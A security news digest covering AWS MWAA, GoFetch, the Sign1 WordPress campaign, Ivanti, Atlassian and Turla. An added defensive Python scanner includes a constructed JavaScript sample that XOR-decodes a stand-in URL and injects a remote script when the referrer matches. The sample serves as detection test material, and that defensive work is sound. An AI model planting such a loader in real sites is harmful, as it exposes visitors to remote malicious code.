Beyond Information Security

AWS Patches Critical ‘FlowFixation’ Bug in Airflow Service to Prevent Session Hijacking

Cybersecurity researchers have shared details of a now-patched security vulnerability in Amazon Web Services (AWS) Managed Workflows for Apache Airflow (MWAA) that could be potentially exploited by a malicious actor to hijack victims’ sessions and achieve remote code execution on underlying instances.

The vulnerability, now addressed by AWS, has been codenamed FlowFixation by Tenable.

“Upon taking over the victim’s account, the attacker could have performed tasks such as reading connection strings, adding configurations and triggering directed acyclic graphs (DAGs),” senior security researcher Liv Matan said in a technical analysis.

“Under certain circumstances such actions can result in RCE on the instance that underlies the MWAA, and in lateral movement to other services.”

Source: The Hacker News

Link: https://thehackernews.com/2024/03/aws-patches-critical-flowfixation-bug.html


New GoFetch attack on Apple Silicon CPUs can steal crypto keys

A new side-channel attack called “GoFetch” impacts Apple M1, M2, and M3 processors and can be used to steal secret cryptographic keys from data in the CPU’s cache.

The attack abuses the data memory-dependent prefetchers (DMPs) found in modern Apple CPUs to defeat constant-time cryptographic implementations. This allows it to recover the private keys of various algorithms, including OpenSSL Diffie-Hellman, Go RSA, CRYSTALS-Kyber, and CRYSTALS-Dilithium, from data in the CPU’s cache.

GoFetch was developed by a team of seven researchers from various universities in the U.S., who reported their findings to Apple on December 5, 2023.

Source: BleepingComputer / SecurityWeek / Chen, Wang, Shome, Fletcher and team

Link: https://www.bleepingcomputer.com/news/security/new-gofetch-attack-on-apple-silicon-cpus-can-steal-crypto-keys/

Link: https://www.securityweek.com/new-gofetch-apple-cpu-attack-exposes-crypto-keys/

Link: https://gofetch.fail


Massive Sign1 Campaign Infects 39,000+ WordPress Sites with Scam Redirects

A massive malware campaign dubbed Sign1 has compromised over 39,000 WordPress sites in the last six months, using malicious JavaScript injections to redirect users to scam sites.

The most recent variant of the malware is estimated to have infected no less than 2,500 sites over the past two months alone, Sucuri said in a report published this week.

The attacks entail injecting rogue JavaScript into legitimate HTML widgets and plugins that allow arbitrary JavaScript and other code to be inserted, giving attackers an opportunity to add their malicious code. The XOR-encoded JavaScript is subsequently decoded and used to execute a JavaScript file hosted on a remote server, which ultimately redirects visitors to a VexTrio-operated traffic distribution system (TDS), but only if certain criteria are met.
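A defender-side triage script for the pattern described above, added here as an example (it is not Sucuri’s tooling nor code from the original report). It scans inline `<script>` blocks in WordPress widget or post HTML for the combination the write-up describes: an XOR decode loop, a long numeric array holding the encoded payload, a dynamic remote script loader, and gating on referrer, cookie or user agent. The regexes are assumed heuristics, the sample HTML is constructed, and the decoded URL uses the reserved `.invalid` TLD so it resolves to nothing.

```python
"""Heuristic triage for XOR-obfuscated script loaders in WordPress widget HTML.

Added example for this digest; it is not Sucuri's tooling or code from the
original post. It flags inline <script> blocks that pair an XOR decode loop
with dynamic loading of a remote script, then recovers the decoded string for
analyst review. Every sample below is constructed.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Assumed heuristics (not signatures from the report): each regex is one indicator.
INDICATORS = {
    # String.fromCharCode(x ^ key): the XOR decode step
    "xor_decode": re.compile(r"fromCharCode\s*\([^)]*\^", re.S),
    # a long literal array of small integers: the encoded payload
    "numeric_array": re.compile(r"\[\s*(?:\d{1,3}\s*,\s*){8,}\d{1,3}\s*\]"),
    # dynamic script element or document.write: the remote loader
    "remote_loader": re.compile(
        r"createElement\s*\(\s*['\"]script['\"]\s*\)|document\.write\s*\(", re.S),
    # gating on referrer/cookie/UA: redirect only when criteria are met
    "conditional_gate": re.compile(r"document\.referrer|document\.cookie|navigator\.userAgent"),
}
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)
XOR_KEY = re.compile(r"fromCharCode\s*\([^)]*\^\s*(0x[0-9a-fA-F]+|\d+)")


@dataclass
class Finding:
    block_index: int
    indicators: List[str] = field(default_factory=list)
    decoded: Optional[str] = None


def decode_xor_payload(body: str) -> Optional[str]:
    """Recover the string hidden in the numeric array when both array and key are present."""
    arr = INDICATORS["numeric_array"].search(body)
    key = XOR_KEY.search(body)
    if not arr or not key:
        return None
    values = [int(v) for v in re.findall(r"\d+", arr.group(0))]
    key_text = key.group(1)
    k = int(key_text, 16) if key_text.lower().startswith("0x") else int(key_text)
    # Mask to a byte so an odd key or out-of-range value cannot break bytes()
    return bytes((v ^ k) & 0xFF for v in values).decode("latin-1")


def scan_html(html: str) -> List[Finding]:
    """Flag script blocks that combine an XOR decode with a remote loader."""
    findings = []
    for i, m in enumerate(SCRIPT_BLOCK.finditer(html)):
        body = m.group(1)
        hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
        # Either indicator alone is common in benign code; require both.
        if "xor_decode" in hits and "remote_loader" in hits:
            findings.append(Finding(i, hits, decode_xor_payload(body)))
    return findings


# --- constructed samples (not real IoCs) ---------------------------------
SAMPLE_URL = "https://example.invalid/loader.js"  # reserved TLD, resolves nowhere
SAMPLE_KEY = 7
_encoded = ",".join(str(ord(c) ^ SAMPLE_KEY) for c in SAMPLE_URL)

BENIGN_WIDGET = """<div class="widget"><script>
var visits = [12,34,56,78,90,11,22,33,44,55];
document.getElementById('count').textContent = visits.length;
</script></div>"""

SUSPICIOUS_WIDGET = f"""<div class="widget"><script>
var _0x=[{_encoded}];var s='';
for(var i=0;i<_0x.length;i++){{s+=String.fromCharCode(_0x[i]^{SAMPLE_KEY});}}
if(document.referrer.indexOf('search')!==-1){{
  var e=document.createElement('script');e.src=s;document.head.appendChild(e);}}
</script></div>"""


if __name__ == "__main__":
    for label, html in (("benign", BENIGN_WIDGET), ("suspicious", SUSPICIOUS_WIDGET)):
        for f in scan_html(html):
            print(label, f.block_index, f.indicators, f.decoded)
```

The scanner deliberately requires both the decode step and the loader before reporting, because numeric arrays and `String.fromCharCode` on their own are common in legitimate plugins; the decoded URL is surfaced only for analyst review, never fetched.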

Source: The Hacker News / BleepingComputer / SecurityWeek

Link: https://thehackernews.com/2024/03/massive-sign1-campaign-infects-39000.html

Link: https://www.bleepingcomputer.com/news/security/evasive-sign1-malware-campaign-infects-39-000-wordpress-sites/

Link: https://www.securityweek.com/39000-websites-infected-in-sign1-malware-campaign/


Ivanti Releases Urgent Fix for Critical Sentry RCE Vulnerability

Ivanti has disclosed details of a critical remote code execution flaw impacting Standalone Sentry, urging customers to apply the fixes immediately to stay protected against potential cyber threats. Tracked as CVE-2023-41724, the vulnerability carries a CVSS score of 9.6.

“An unauthenticated threat actor can execute arbitrary commands on the underlying operating system of the appliance within the same physical or logical network,” the company said.

The flaw impacts all supported versions (9.17.0, 9.18.0, and 9.19.0) as well as older versions. The company said it has made a patch available (versions 9.17.1, 9.18.1, and 9.19.1) that can be downloaded via the standard download portal.

It credited Vincent Hutsebaut, Pierre Vivegnis, Jerome Nokin, Roberto Suggi Liverani and Antonin B. of NATO Cyber Security Centre for “their collaboration on this issue.”

Ivanti emphasized that it’s not aware of any customers affected by CVE-2023-41724, and added that “threat actors without a valid TLS client certificate enrolled through EPMM cannot directly exploit this issue on the internet.”

Source: The Hacker News / BleepingComputer / SecurityWeek / Ivanti forum

Link: https://thehackernews.com/2024/03/ivanti-releases-urgent-fix-for-critical.html

Link: https://www.bleepingcomputer.com/news/security/ivanti-fixes-critical-standalone-sentry-bug-reported-by-nato/

Link: https://www.securityweek.com/ivanti-patches-critical-vulnerabilities-in-standalone-sentry-neurons-for-itsm/

Link: https://forums.ivanti.com/s/article/KB-CVE-2023-41724-Remote-Code-Execution-for-Ivanti-Standalone-Sentry?language=en_US


Atlassian Releases Fixes for Over 2 Dozen Flaws, Including Critical Bamboo Bug

Atlassian has released patches for more than two dozen security flaws, including a critical bug impacting Bamboo Data Center and Server that could be exploited without requiring user interaction.

Tracked as CVE-2024-1597, the vulnerability carries a CVSS score of 10.0, indicating maximum severity.

Described as an SQL injection flaw, it’s rooted in a dependency called org.postgresql:postgresql, as a result of which the company said it “presents a lower assessed risk” despite the criticality.

“This org.postgresql:postgresql dependency vulnerability […] could allow an unauthenticated attacker to expose assets in your environment susceptible to exploitation which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires no user interaction,” Atlassian said.

Source: The Hacker News / SecurityWeek

Link: https://thehackernews.com/2024/03/atlassian-releases-fixes-for-over-2.html

Link: https://www.securityweek.com/atlassian-patches-critical-vulnerability-in-bamboo-data-center-and-server/


New details on TinyTurla’s post-compromise activity reveal full kill chain

Cisco Talos is providing an update on its two recent reports on a new and ongoing campaign where Turla, a Russian espionage group, deployed their TinyTurla-NG (TTNG) implant. We now have new information on the entire kill chain this actor uses, including the tactics, techniques and procedures (TTPs) utilized to steal valuable information from their victims and propagate through their infected enterprises.

Talos’ analysis, in coordination with CERT.NGO, reveals that Turla infected multiple systems in the compromised network of a European non-governmental organization (NGO). The attackers compromised the first system, established persistence and added exclusions to anti-virus products running on these endpoints as part of their preliminary post-compromise actions.

Turla then opened additional channels of communication via Chisel for data exfiltration and to pivot to additional accessible systems in the network.

Source: Cisco Talos Intelligence Group

Link: https://blog.talosintelligence.com/tinyturla-full-kill-chain/